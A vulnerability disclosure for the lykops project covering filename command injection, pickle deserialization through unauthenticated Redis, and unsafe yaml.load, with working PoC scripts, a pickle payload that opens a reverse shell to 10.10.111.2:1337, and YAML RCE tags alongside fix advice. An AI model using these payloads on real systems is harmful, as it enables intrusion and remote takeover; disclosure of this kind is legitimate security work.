lykops has multiple vulnerabilities

0x00    intro

- github repo: https://github.com/lykops/lykops
- 121 stars and 65 forks as of 2021/2/6





0x01    Post-Auth OS-command injection

The sink is lykops/library/utils/file.py#248 -> upload_file()





The caller is lykops/lykops/ansible/yaml.py#74 (github link here).

The vulnerable parameter is the uploaded file, taken from request.FILES[] of our HTTP request; its filename is passed on without any sanitization.

So we fully control the unsanitized parameter and get an OS command injection:


  1. The corresponding route is ^ansible/yaml/import$, so the vulnerability is triggered by posting to it.
  2. An exception makes import_file() run a second time, so a `sleep 5` command produces a delay of about 10 seconds.


POST /ansible/yaml/import/ 
Host: lykops
...

...
...;filename="test.txt$(sleep 5)"
...
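The request above, as a timing probe in Python. This is an added example, not lykops code; it assumes the upload field is named "file", that the target answers as http://lykops/ on port 80, and that you hold a session cookie (the bug is post-auth, and the cookie name is a placeholder). It also carries the allow-list check the upload handler should have applied to the filename.

```python
#!/usr/bin/env python3
"""Timing probe for the filename command injection in /ansible/yaml/import/.

Added example, not lykops code. Assumed: upload field "file", target
http://lykops:80/, and an authenticated session cookie (placeholder value).
"""
import http.client
import re
import time

SLEEP_SECONDS = 5
# $(...) is expanded once the filename reaches a shell
INJECTED_FILENAME = f"test.txt$(sleep {SLEEP_SECONDS})"

SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def build_multipart(field, filename, content, boundary="----lykopsPoC"):
    """Return (body, content_type) for a one-file multipart/form-data POST.
    The filename goes verbatim into Content-Disposition, which is exactly
    where the injected string travels."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: text/plain\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def looks_injected(elapsed, sleep_seconds=SLEEP_SECONDS, invocations=2):
    """import_file() runs twice when it raises, so the observable delay is
    invocations * sleep_seconds (10 s for sleep 5)."""
    return elapsed >= invocations * sleep_seconds


def send_upload(host, port, cookie, filename, path="/ansible/yaml/import/"):
    """POST the file and return (status, elapsed_seconds)."""
    body, ctype = build_multipart("file", filename, b"---\nkey: value\n")
    conn = http.client.HTTPConnection(host, port, timeout=60)
    start = time.monotonic()
    conn.request("POST", path, body=body,
                 headers={"Content-Type": ctype, "Cookie": cookie})
    resp = conn.getresponse()
    resp.read()
    elapsed = time.monotonic() - start
    conn.close()
    return resp.status, elapsed


def is_safe_filename(name):
    """Allow-list check the handler should apply before the name can reach a
    shell (better still: pass the name as one subprocess argument, no shell)."""
    return bool(SAFE_NAME.match(name)) and name not in (".", "..")


if __name__ == "__main__":
    # placeholder target and cookie; replace with real values
    status, t = send_upload("lykops", 80, "sessionid=REPLACE_ME", INJECTED_FILENAME)
    print(f"HTTP {status} after {t:.1f}s, injected: {looks_injected(t)}")
```

Measure a baseline upload with a clean filename first; only a delay close to the doubled sleep, not a slow server, confirms the injection.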



0x02    Pre-Auth pickle Deserialization RCE via Unauthenticated Redis

The login route is ^login.html; the corresponding implementation is the Login->login function.


Following get_userinfo, it turns out that the user's login cache is retrieved from Redis.


At line 81 the variable user=adminuser is passed in; searching the code base for adminuser shows that its default value is lykops.





Further, Redis stores a string, so to turn it back into a Python object there has to be a deserialization step.
If that deserialization is not properly restricted, there is a vulnerability. So which function does it use to deserialize?


pickle.loads! this evil function! 

In the implementation of get, when the input parameter is fmt=obj the string fetched from Redis is deserialized, and the function used for that is pickle.loads!

If you are not familiar with Python deserialization attacks, see the post python deserialization attacks from scratch.

The following figure shows a demo that uses deserialization to run commands in a Python cmdline.

So the script for generating the payload is as follows:

#!/usr/bin/env python3
import pickle
import os

class py():
    # pickle.loads() calls the returned callable with the returned args,
    # so loading this object runs os.system() with the reverse-shell command
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py())
# protocol 3 output (Python < 3.8; 3.8+ defaults to protocol 4, which pickle.loads accepts just the same):
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.2/1337 0>&1q\x01\x85q\x02Rq\x03.'



0x03    Post-Auth YAML Deserialization RCE

First, one should know that improper use of yaml.load
leads to arbitrary Python object loading, which in most cases means RCE.

For the original warning, see the tutorial at https://pyyaml.org/wiki/PyYAMLDocumentation#Tutorial

Loading YAML

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.


Searching for yaml.load finds this, library/utils/yaml.py#27 (github link here).

The invocation comes from yaml_loader(), which is triggered in the upload function, so a YAML file containing the following tag is enough:

!!python/object/new:os.system ["sleep 2"]

So we get a Post-Auth RCE.
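The vulnerable and the safe loader side by side, as an added example that is not lykops code (it needs PyYAML). PAGE_PAYLOAD is the tag from above; PROBE uses the same python/ tag mechanism with os.getpid, so proving that the full Loader executes the callable has no side effect. The tag scanner is an extra pre-check an upload handler could run; it is not something the project does.

```python
#!/usr/bin/env python3
"""yaml.load (full Loader) versus yaml.safe_load on a python/ tag.

Added example, not lykops code; needs PyYAML.
"""
import os
import re

try:
    import yaml
except ImportError:          # keep the module importable without PyYAML
    yaml = None

HAVE_YAML = yaml is not None

PAGE_PAYLOAD = '!!python/object/new:os.system ["sleep 2"]'
# same mechanism, harmless callable: the full Loader returns os.getpid()
PROBE = "!!python/object/apply:os.getpid []"

PY_TAG = re.compile(r"!!python/[\w./:]+")


def find_python_tags(text):
    """Cheap pre-check for an upload handler: any !!python/ tag would be
    turned into a call by the full Loader."""
    return PY_TAG.findall(text)


def unsafe_load(text):
    """What library/utils/yaml.py does: the full Loader resolves python/
    tags to importable callables and invokes them."""
    return yaml.load(text, Loader=yaml.Loader)


def safe_load(text):
    """The fix: SafeLoader has no constructor for python/ tags and raises."""
    return yaml.safe_load(text)


def probe_executes():
    """True when unsafe_load really ran os.getpid() in this process."""
    return unsafe_load(PROBE) == os.getpid()


def safe_load_rejects(text):
    try:
        safe_load(text)
    except yaml.YAMLError:   # ConstructorError: no constructor for the tag
        return True
    return False


if __name__ == "__main__":
    print("python tags:", find_python_tags(PAGE_PAYLOAD))
    if HAVE_YAML:
        print("full Loader executed os.getpid():", probe_executes())
        print("safe_load rejects the page payload:", safe_load_rejects(PAGE_PAYLOAD))
```

Use yaml.safe_load for any YAML that a user can upload; yaml.Loader, yaml.UnsafeLoader and, in older PyYAML releases, FullLoader all construct python/ tags.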

The source is in library/utils/file.py (github link here).
